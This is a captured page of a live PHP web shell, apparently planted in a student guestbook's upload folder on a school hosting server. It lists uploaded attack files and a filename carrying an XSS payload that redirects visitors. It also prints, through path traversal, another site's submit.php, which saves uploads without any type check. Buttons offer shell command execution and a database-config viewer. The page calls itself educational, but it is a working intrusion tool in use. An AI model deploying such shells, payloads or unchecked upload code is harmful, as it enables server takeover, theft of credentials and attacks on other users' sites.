🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../574486.klas4s23.mid-ica.nl/public_html/Gastenboek/submit.php

<?php
session_start();

// Controleren of het laatste bericht minder dan 1 uur geleden is verzonden
if (isset($_SESSION['last_post_time']) && time() - $_SESSION['last_post_time'] < 3600) {
    // JavaScript om een pop-upmelding weer te geven
    echo '<script>alert("Je kunt maar één bericht per uur plaatsen.");</script>';
    // Terug naar de beginpagina sturen
    echo '<script>window.location.href = "index.php";</script>';
} else {
    // Formuliergegevens verwerken en opslaan in json-bestand
    $name = $_POST['name'];
    $message = $_POST['message'];
    $timestamp = date('Y-m-d H:i:s');

    // Bestandsnaam van de afbeelding genereren
    $imageFileName = uniqid() . '_' . $_FILES['image']['name'];
    $imageTempPath = $_FILES['image']['tmp_name'];
    $imagePath = 'uploads/' . $imageFileName;

    // Controleren of de afbeelding succesvol is geΓΌpload
    if (move_uploaded_file($imageTempPath, $imagePath)) {
        // Informatie over het bericht opslaan
        $entry = [
            'name' => $name,
            'message' => $message,
            'timestamp' => $timestamp,
            'image' => $imagePath
        ];

        // Bestaande berichten ophalen
        $entries = file_exists('guestbook.json') ? json_decode(file_get_contents('guestbook.json'), true) : [];

        // Nieuw bericht toevoegen
        $entries[] = $entry;

        // Berichten opslaan in JSON-bestand
        file_put_contents('guestbook.json', json_encode($entries));

        // Laatste posttijd bijwerken
        $_SESSION['last_post_time'] = time();

        echo "Bericht succesvol toegevoegd aan het gastenboek!";
        // Terug naar de beginpagina sturen
        echo '<script>window.location.href = "index.php";</script>';
    } else {
        echo "Er is een fout opgetreden bij het uploaden van de afbeelding.";
        // Terug naar de beginpagina sturen
        echo '<script>window.location.href = "index.php";</script>';
    }
}
?>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!